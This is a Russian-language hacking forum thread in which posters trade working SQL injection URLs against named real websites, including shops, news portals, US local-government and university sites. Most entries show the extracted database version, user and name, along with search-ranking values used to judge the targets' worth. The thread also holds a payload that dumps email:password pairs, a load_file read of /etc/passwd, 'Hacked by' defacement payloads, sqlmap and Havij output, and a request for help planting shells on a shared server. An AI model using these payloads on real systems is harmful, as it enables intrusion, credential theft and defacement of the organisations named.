SQL Инъекции

Code:

http://www.feb.spb.ru/catalog.php?id=-17+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10+from+information_schema.tables+--+

Database:zorro_feb@localhost
Version:5.0.51a-24+lenny5-log
User:zorro_feb

Тиц 60
PR 2

Code:

http://www.shery.ru/news/?id=-17+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7+--+

Database:shery@localhost
Version:5.5.15
User:shery

Тиц 80
PR 2

 

торрент портальчик

Code:

http://baratro.ru/subcat.php?id=22' AND (SELECT 9355 FROM(SELECT COUNT(*),CONCAT(0x3a6476703a,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x3a6c756d3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a

 

Просто забавный сайт.

PHP:

http://www.bitchslapcountdown.com/index.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--+

 

Code:

http://www.rundown.com/landing.php?loc=1-99999999.9+union+select+1,2,3,4,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f

 

Работа (Индия).

Code:

http://www.jobs-bank.com/jobdetails.php?jobid=1-1.1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),7,8,9,10--

Database Version: 5.0.86
Database name: chintajobs
User name: [email protected]

ТИЦ: 0
PR: 3

Бильярд.

Code:

http://www.azbilliards.com/brackets/show32ls.php?tourneynum=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12,13,14,15,16--

Database Version: 5.5.9
Database name: brackets
User name: admin@localhost

ТИЦ: 40
PR: 5

 

co.rice.mn.us PR-5

Code:

http://www.co.rice.mn.us/news/newsitem.php?id=-518+union+select+version()||chr(58)||current_user||chr(58)||current_database(),null,null,null,null,null,null,null,null+--+

Code:

PostgreSQL 8.3.17 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2:ricecouser:riceco

farmington.edu PR-6
Оракл Блайнд

Code:

http://www.farmington.edu/news/release.php?id=3321 AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1)) = 87

Code:

http://www.farmington.edu/news/release.php?id=3321 AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1)) = 69

...

Code:

WEBCALENDAR

ci.bremerton.wa.us PR-5

Code:

www.ci.bremerton.wa.us/display.php?id=96 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14 --

Code:

5.0.51a-3ubuntu5.7:bremcity@localhost:bremcity

(вывод в сорце 34я строка)

 

Code:

http://www.6koles-e.ru/inner.php?cid=10&id=-17+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+--+

Тиц 30
PR 3

 

_http://www.burlingtonshair.com/shop.php?id=2
_http://www.homeshoppingradio.com/category.php?id=26
_http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726

 

Code:

http://www.burlingtonshair.com/shop.php?id=-2'+union+select+1,concat(0x4861636b6564206279204572656565),3--+f
http://www.homeshoppingradio.com/category.php?id=26-99999.9+union+select+1,concat(0x4861636b6564206279204572656565),3--+f
http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726+and(select+1+from(select+count(*),concat((select+concat(0x4861636b6564206279204572656565,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f

 

artsandscience.usask.ca PR-6

Code:

http://artsandscience.usask.ca/biology/news/news.php?newsid=-2334+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,version()||chr(58)||current_user||chr(58)||current_database(),null,null,null,null,null,null,null,null,null+--+

Code:

PostgreSQL 9.0.7 on x86_64-pc-linux-gnu, compiled by GCC x86_64-pc-linux-gnu-gcc (Gentoo 4.5.3-r2 p1.1, pie-0.4.7) 4.5.3, 64-bit:webuser:webdb

communication.northwestern.edu PR-6

Code:

http://www.communication.northwestern.edu/news/press_release.php?itemID=155-999.9+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16--

Code:

5.0.77-log:UtopiaUser@localhost:Utopia

to14.com PR-3 A-549k

Code:

www.to14.com/game.php?id=-4d486a30869bd'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19+--+

Code:

5.0.44-log:to14@localhost:to14

 

Code:

http://www.stroyka74.ru/tenders/-1459768'+union+select+1,2,3,4,5,6,7,8,9,concat(email,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+stroyka74_users+limit+1,1+--+

тИЦ 600
PR 4

 

Code:

http://www.star-book.ru/print.php?id=11+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--

User: svertokr_boo@localhost
Database: svertokr_book
Version: 5.1.56-log

 

тИЦ - 130, PR - 3.

Вывод в теге <title></title>.

Version: 5.1.41-log
User: [email protected]
Database: bdhorse_db



тИЦ - 150, PR - 3.

Version: 5.1.52
User: us5254a_kv_main@localhost
Database: db5254a

 

На сервере около 30 сайтов средним ТИЦ = 10 каждый, есть и больше. Кто зальется, напишите в ПМ, как раскрыли пути(вечно у меня с ними проблема). Спасибо.

PHP:

http://world-stamps.info/countryw.php?id_country=-1'+union+select+load_file('/etc/passwd')--+

 

Ну раз он говорит, что "is vulnerable", почему не раскручивает скулю?


Sqlmap:
GET parameter 'SECTION_ID' is vulnerable. Do you want to keep testing the others
? [y/N] y
sqlmap identified the following injection points with a total of 60 HTTP(s) requ
ests:
---
Place: GET
Parameter: SECTION_ID
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: SECTION_ID=2') AND SLEEP(5) AND ('hJWR'='hJWR
---

[13:01:32] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Nginx
back-end DBMS: MySQL 5.0.11
[13:01:32] [INFO] fetching current database
[13:01:32] [INFO] retrieved:
current database: None

[13:01:37] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap-0.
9\sqlmap\output\www.opin.ru'




Havij
Selected Column Count is 2
Retying to find string column
Retying to find string column
Retying to find string column
Retying to find string column
Retying to find string column
Valid String Column is 1
DB Server: unknown
Finding current data base
Database type was not recognized, Injection Failed!

 

скромненько

 

cta-m.ru

5.0.95-community
Яндекс тИЦ (CY) 10
Google PageRank (PR) 1




m-words.ru

5.0.91
Яндекс тИЦ (CY) 10
Google PageRank (PR) 1



inconnect-group.ru

5.0.51a-24+lenny2+spu1-log
Яндекс тИЦ (CY) 650
Google PageRank (PR) 5




vgasoft.spb.ru

5.0.91-log
Яндекс тИЦ (CY) 40
Google PageRank (PR) 2

 

PHP:

http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11--

PHP:

http://www.24info.net/sim.php?id=-71+union+select+1,2,3,4,5,6,7,8,concat_ws(0x03a,user(),database(),version())--

 

-------------------------------------

ps модеры сорри что сначала не туда запостил

 

Ня!

PHP:

http://justmypassion.fr/index.php?id=-37+union+select+1,2,@@datadir,4,5--